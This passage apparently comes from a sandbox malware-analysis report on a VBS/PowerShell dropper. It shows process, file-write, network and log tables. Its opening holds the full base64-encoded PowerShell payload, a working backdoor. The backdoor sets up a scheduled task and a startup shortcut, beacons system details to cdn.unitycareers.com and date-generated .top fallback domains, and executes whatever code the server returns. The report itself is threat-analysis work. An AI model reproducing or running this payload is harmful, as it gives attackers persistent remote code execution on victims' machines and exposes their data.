'JGd3ZnNlenlpY3ggPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICRnd2ZzZXp5aWN4KSkgeyBtZCAkZ3dmc2V6eWljeDsgfQokeGhoenRkZ3MgPSAkZ3dmc2V6eWljeCArICJcV2luZG93c0luZGV4aW5nU2VydmljZS52YnMiOwokdXN5amR6YiAgPSAiMTAwNi4xIjsKJGZpeGV3aXggPSAkZW52OnRlbXAgKyAiXEFGWDUwMDU4LnRtcCI7CiRkaXR1dmZ0c2NiICA9ICRnd2ZzZXp5aWN4ICsgIlx0aHVtYmNhY2hlXzY0LmRiIjsKJG15dXJscG9zdCA9ICRmYWxzZTsKJGpzd2ZiaHl3diA9ICJ3IjsKCmZ1bmN0aW9uIGlhbXdvcmsyeyBzYyAtUGF0aCAkZml4ZXdpeCAtVmFsdWUgJChHZXQtRGF0ZSk7IH07CmZ1bmN0aW9uIHZidGh0c2Rid2MoICRhd2l5ZGV0eiApewogIGlmKCAkYXdpeWRldHogLW1hdGNoICdPdXRPZk1lbW9yeUV4Y2VwdGlvbicgKXsKICAgIHJpIC1QYXRoICRmaXhld2l4IC1Gb3JjZTsKICAgIGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzOwogICAgZXhpdDsKICB9Owp9CgpmdW5jdGlvbiBzZW5kcG9zdDIoICRhd2l5ZGV0eiApewogIGlmKCAhJG15dXJscG9zdCApeyByZXR1cm4gJGZhbHNlOyB9OwogICR4Z3ZiZXVkYWogPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OwogICR4Z3ZiZXVkYWouQ3JlZGVudGlhbHMgPSBbU3lzdGVtLk5ldC5DcmVkZW50aWFsQ2FjaGVdOjpEZWZhdWx0Q3JlZGVudGlhbHM7CiAgJHhndmJldWRhai5IZWFkZXJzLkFkZCgiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZCIpOwogICR4Z3ZiZXVkYWouRW5jb2RpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4OwogIHRyeXsKICAgICRiaWRoY2Z6dncgPSAkeGd2YmV1ZGFqLlVwbG9hZFN0cmluZyggJG15dXJscG9zdCwgImw9IitbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggKCAidj0kdXN5amR6YiZndWlkPSRiZ3lmeHp0ZSYiICsgJGF3aXlkZXR6ICkgKSApICk7CiAgICAkYmlkaGNmenZ3ID0gW3N0cmluZ11bU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyggJGJpZGhjZnp2dyApICk7CiAgICBpZiggISRqc3dmYmh5d3YgKXsgcmV0dXJuICRmYWxzZTsgfQogICAgaWYoICR4YWJ5dnd1eGkgLWVxICRiaWRoY2Z6dncuU3Vic3RyaW5nKDAsMTYpICl7CiAgICAgIHJldHVybiAkYmlkaGNmenZ3LlN1YnN0cmluZygxNiwkYmlkaGNmenZ3Lmxlbmd0aC0xNikgOwogICAgfWVsc2V7CiAgICAgICRqc3dmYmh5d3YgPSAkZmFsc2U7CiAgICAgIHNlbmRwb3N0MiAoImVycm9yPSIgKyBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcyggJGJpZGhjZnp2dyApICkgKTsKICAgIH0KICB9Y2F0Y2h7CiAgICB2YnRodHNkYndjICRfLkV4Y2VwdGlvbi5NZXNzYWdlOwogICAgJGpzd2ZiaHl3diA9ICRmYWxzZTsKICAgICR4Z3ZiZXVkYWouVXBsb2FkU3RyaW5nKCAkbXl1cmxwb3N0LCAibD0iK1tDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1RleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAoICJ2PSR1c3lqZHpiJmd1aWQ9JGJneWZ4enRlJmVycm9yPXNlbmRwb3N0MjoiICsgJG15dXJscG9zdCsiOiIrJGJpZGhjZnp2dyArIjoiKyAkXy5FeGNlcHRpb24uTWVzc2FnZSApICkgKSApOwogIH07CiAgcmV0dXJuICRmYWxzZTsKfTsKCmZ1bmN0aW9uIHllaWpkaXNndHQoICR5eHpoeHp6ICl7CiAgJGZiY2loZmd3aSA9ICJodHRwOi8vY2RuLnVuaXR5Y2FyZWVycy5jb20vIjsKICAiaGVlIiwieHUxIiwiaHMwIiwiamQ1IiwibXFmIiB8ICV7ICRmYmNpaGZnd2kgKz0gIiwiKyJodHRwOi8vIisgKCBbQ29udmVydF06OlRvQmFzZTY0U3RyaW5nKCBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCAkXysgJChHZXQtRGF0ZSAtVUZvcm1hdCAiJXklbSVWIikgKSApLnRvTG93ZXIoKSApICsiLnRvcC8iOyB9OwogICRmYmNpaGZnd2kuc3BsaXQoIiwiKSB8ICV7CiAgICBpZiggISRteXVybHBvc3QgKXsKICAgICAgJG15dXJscG9zdCA9ICRfOwogICAgICBpZiggIShzZW5kcG9zdDIgKCR5eHpoeHp6ICsgIiZkb21lbj0kbXl1cmxwb3N0IiApKSApeyAkbXl1cmxwb3N0ID0gJGZhbHNlOyB9OwogICAgICBTdGFydC1TbGVlcCAtcyA1OwogICAgfQogIH07CiAgaWYoICR5eHpoeHp6IC1tYXRjaCAic3RhdHVzPXJlZ2lzdGVyIiApewogICAgcmV0dXJuICJvayI7CiAgfWVsc2V7CiAgICByZXR1cm4gJG15dXJscG9zdDsKICB9IAp9OwoKaWYgKCBUZXN0LVBhdGggJGZpeGV3aXggKXsKICBpZiAoICggKCBORVctVElNRVNQQU4gLVN0YXJ0ICgoR2V0LUNoaWxkSXRlbSAkZml4ZXdpeCApLkNyZWF0aW9uVGltZSkgLUVuZCAoR2V0LURhdGUpKS5NaW51dGVzICkgLWd0IDE1ICl7CiAgICByaSAtUGF0aCAkZml4ZXdpeCAtRm9yY2U7CiAgICB0cnl7IGdldC1wcm9jZXNzIHBvd2Vyc2hlbGwqIHwgc3RvcC1wcm9jZXNzIH1jYXRjaHt9OwogICAgZXhpdDsKICB9ZWxzZXsgZXhpdDsgfTsKfTsKCmZ1bmN0aW9uIHRjeGN1amcoICRpZ3R3dWJkICl7CiAgaWYoICRpZ3R3dWJkICl7CiAgICBzYyAtUGF0aCAkZGl0dXZmdHNjYiAtVmFsdWUgKCBbZ3VpZF06Ok5ld0d1aWQoKSwgKCBbZ3VpZF06Ok5ld0d1aWQoKSAtcmVwbGFjZSAnLScsJycgKS5TdWJzdHJpbmcoMCwxNikgIC1qb2luICcsJyApIC1Gb3JjZTsgIAogICAgZ2kgJGRpdHV2ZnRzY2IgLUZvcmNlIHwgICV7ICRfLkF0dHJpYnV0ZXMgPSAiSGlkZGVuIiB9OwogICAgdHJ5ewogICAgICAkc2dqY2J2Zmd4dCA9IFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0FwcGxpY2F0aW9uU2VydmljZS5sbmsnOwogICAgICBpZiggLW5vdCAoIFRlc3QtUGF0aCAkc2dqY2J2Zmd4dCApICl7CiAgICAgICAgJHVleWNoaGkgPSBOZXctT2JqZWN0IC1Db21PYmplY3QgKCdXU2NyaXB0LlNoZWxsJyk7CiAgICAgICAgJGF0d2l4d2V5eHcgPSAkdWV5Y2hoaS5DcmVhdGVTaG9ydGN1dCggJHNnamNidmZneHQgICk7CiAgICAgICAgJGF0d2l4d2V5eHcuVGFyZ2V0UGF0aCA9ICR4aGh6dGRnczsKICAgICAgICAkYXR3aXh3ZXl4dy5Xb3JraW5nRGlyZWN0b3J5ID0gJGd3ZnNlenlpY3g7CiAgICAgICAgJGF0d2l4d2V5eHcuV2luZG93U3R5bGUgPSAxOwogICAgICAgICRhdHdpeHdleXh3LkRlc2NyaXB0aW9uID0gJ1dpbmRvd3MgQXBwbGljYXRpb24gU2VydmljZSc7CiAgICAgICAgJGF0d2l4d2V5eHcuU2F2ZSgpOwogICAgICB9CiAgICB9Y2F0Y2h7fTsKICAgICRiZ3lmeHp0ZSwgJHhhYnl2d3V4aSA9IChnZXQtY29udGVudCAkZGl0dXZmdHNjYikuc3BsaXQoJywnKTsKICAgICRmdWdqaGFod3ogPSAic3RhdHVzPXJlZ2lzdGVyJnNzaWQ9JHhhYnl2d3V4aSZvcz0iKyhbc3RyaW5nXSRQU1ZlcnNpb25UYWJsZS5CdWlsZFZlcnNpb24pKyImcHN2ZXI9IisoICggKEdldC1Ib3N0KS5WZXJzaW9uICkuTWFqb3IgKSsgIiZjb21wX25hbWU9IiArICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE5hbWUpLk5hbWUudHJpbSgpICk7CiAgICBpZiggVGVzdC1QYXRoICggJGd3ZnNlenlpY3ggKyAiXHRodW1iY2FjaGVfMzMuZGIiICkgKXsKICAgICAgcmkgLVBhdGggKCAkZ3dmc2V6eWljeCArICJcdGh1bWJjYWNoZV8zMy5kYiIgKSwgKCAkZ3dmc2V6eWljeCArICJcV2luZG93c0luZGV4aW5nU2VydmljZS5qcyIgKSAtRm9yY2U7CiAgICAgIHRyeXsgc2NodGFza3MuZXhlIC9kZWxldGUgL1ROICJXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICB0cnl7IHNjaHRhc2tzLmV4ZSAvZGVsZXRlIC9UTiAiV2luZG93cyBJbmRleGluZyBTZXJ2aWNlIiAvZiB9Y2F0Y2h7fQogICAgICBpZiggVGVzdC1QYXRoICggW0Vudmlyb25tZW50XTo6R2V0Rm9sZGVyUGF0aCgnU3RhcnR1cCcpICsgJ1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmxuaycgKSAgKXsKICAgICAgICByaSAtUGF0aCAoIFtFbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ1N0YXJ0dXAnKSArICdcV2luZG93c0luZGV4aW5nU2VydmljZS5sbmsnICkgLUZvcmNlOwogICAgICB9CiAgICB9CiAgICAkZ2d3YWl2d3MgPSB5ZWlqZGlzZ3R0ICRmdWdqaGFod3o7CiAgICBpZiggJGdnd2FpdndzIC1uZSAib2siKXsKICAgICAgcmkgLVBhdGggJGRpdHV2ZnRzY2IgLUZvcmNlOwogICAgICBleGl0OwogICAgfQogIH0KICByZXR1cm4gKGdldC1jb250ZW50ICRkaXR1dmZ0c2NiKS5zcGxpdCgnLCcpOwp9CiR3dmNhamV0ID0gKHNjaHRhc2tzLmV4ZSAvY3JlYXRlIC9UTiAiV2luZG93c0FwcGxpY2F0aW9uU2VydmljZSIgL3NjIERBSUxZIC9zdCAwMDowMCAvZiAvUkkgMTQgL2R1IDIzOjU5IC9UUiAkeGhoenRkZ3MpOyAKaWYgKCBUZXN0LVBhdGggJGRpdHV2ZnRzY2IgKXsKICAkYmd5Znh6dGUsICR4YWJ5dnd1eGkgPSAgdGN4Y3VqZyAkZmFsc2U7CiAgaWYoICR4YWJ5dnd1eGkubGVuZ3RoIC1uZSAxNiAgKXsgJGJneWZ4enRlLCAkeGFieXZ3dXhpID0gIHRjeGN1amcgJHRydWU7IH0KfWVsc2V7CiAgJGJneWZ4enRlLCAkeGFieXZ3dXhpID0gIHRjeGN1amcgJHRydWU7Cn0KJG15dXJscG9zdCA9IHllaWpkaXNndHQ7CndoaWxlKCAkanN3ZmJoeXd2ICl7CiAgaWFtd29yazI7CiAgdHJ5ewogICAgaWYoICRqc3dmYmh5d3YgLWFuZCAoJGpzd2ZiaHl3di5sZW5ndGggLWd0IDMwKSAgKXsKICAgICAgaWV4ICRqc3dmYmh5d3Y7CiAgICB9OwogIH1jYXRjaHsgdmJ0aHRzZGJ3YyAkXy5FeGNlcHRpb24uTWVzc2FnZTsgfTsKICBTdGFydC1TbGVlcCAtcyAyODA7CiAgJGpzd2ZiaHl3diA9IHNlbmRwb3N0MjsKfTsKcmkgLVBhdGggJGZpeGV3aXggLUZvcmNlOwo=' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService (2).vbs | — | |
MD5:— | SHA256:— | |||
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService (3).vbs | — | |
MD5:— | SHA256:— | |||
2648 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRa2648.174\WindowsIndexingService.vbs | — | |
MD5:— | SHA256:— | |||
1876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4E9XHDHTJJ0M29JIL6FN.temp | — | |
MD5:— | SHA256:— | |||
2296 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B91S7V9H7DLUOAV9Z22.temp | — | |
MD5:— | SHA256:— | |||
1856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X5EK5GNG1HWULJHRUJMH.temp | — | |
MD5:— | SHA256:— | |||
2384 | mmc.exe | C:\Users\admin\AppData\Roaming\Microsoft\MMC\taskschd | xml | |
MD5:65EC591D40AB65FE091A4D9493903BCA | SHA256:CA3EBFCFD19BE1E13B22C73F94022FBFA6F48AB2F2B71B70654AFCA51757D8BE | |||
1856 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF165931.TMP | binary | |
MD5:4C55FB736B5823D4C1F277BE226111D3 | SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B | |||
1876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF15c722.TMP | binary | |
MD5:4C55FB736B5823D4C1F277BE226111D3 | SHA256:A7471F464E931AAD365E5A751019F5F21931417F3DCD221ADC662ED7215EEE5B | |||
1876 | powershell.exe | C:\Users\Public\Libraries\thumbcache_64.db | text | |
MD5:C443AEE41897B6A40F4F7029980AA5CC | SHA256:D7DB6272491D77B2847D5B411085CA1A82DA961CACF87A798F64C88B4B27E643 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1876 | powershell.exe | POST | 200 | 185.212.47.91:80 | http://cdn.unitycareers.com/ | DE | text | 24 b | malicious |
1876 | powershell.exe | POST | 200 | 185.212.47.91:80 | http://cdn.unitycareers.com/ | DE | text | 3.48 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1876 | powershell.exe | 185.212.47.91:80 | cdn.unitycareers.com | 23media GmbH | DE | malicious |
Domain | IP | Reputation |
---|---|---|
cdn.unitycareers.com |
| malicious |
Process | Message |
---|---|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | OnInitialize: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | Constructor: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | AddIcons: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|
mmc.exe | ProcessCommandLineArguments: Microsoft.TaskScheduler.SnapIn.TaskSchedulerSnapIn
|